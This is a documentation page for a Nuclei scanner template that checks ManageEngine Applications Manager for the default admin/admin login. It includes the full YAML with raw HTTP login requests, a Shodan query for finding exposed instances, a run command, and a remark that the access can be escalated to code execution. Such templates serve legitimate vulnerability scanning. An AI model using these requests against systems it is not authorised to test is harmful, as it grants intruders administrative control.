Skip to content
Nuclei Templates

ManageEngine Applications Manager - Default Credentials

ID: app-manager-default-login

Severity: high

Author: 0midC13

Tags: default-login,manageengine,zoho

Description

Section titled “Description”

Default credentials grants administrative access to ManageEngine Applications Manager, which can be later escalated into a RCE via DB queries.

YAML Source

Section titled “YAML Source”
id: app-manager-default-login


info:
  name: ManageEngine Applications Manager - Default Credentials
  author: 0midC13
  severity: high
  description: |
    Default credentials grants administrative access to ManageEngine Applications Manager, which can be later escalated into a RCE via DB queries.
  reference:
    - https://www.manageengine.com/products/applications_manager/
  metadata:
    shodan-query: title:"Applications Manager Login Screen"
    verified: true
    max-request: 1
  tags: default-login,manageengine,zoho


variables:
  username: "admin"
  password: "admin"


http:
  - raw:
      - |
        GET /index.do HTTP/1.1
        Host: {{Hostname}}


  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/index.do


        clienttype=html&webstart=&j_username=admin&ScreenWidth=1280&ScreenHeight=709&username={{username}}&j_password={{password}}


  - raw:
      - |
        GET /showresource.do?group=All&method=showResourceTypes&monitor_viewtype=categoryview HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/j_security_check


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Super Administrator"
          - "Add Application"
        condition: and
# digest: 4b0a00483046022100dbbba72fef683ecf1b201589665d52b6db4dba0ee74ebde6e73a185f3f20b60c022100ebc65e5a6b5cd981b77bdd3c81b44150477969bb489a61326378f5140fc23f38:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/zoho/app-manager-default-login.yaml"

View on Github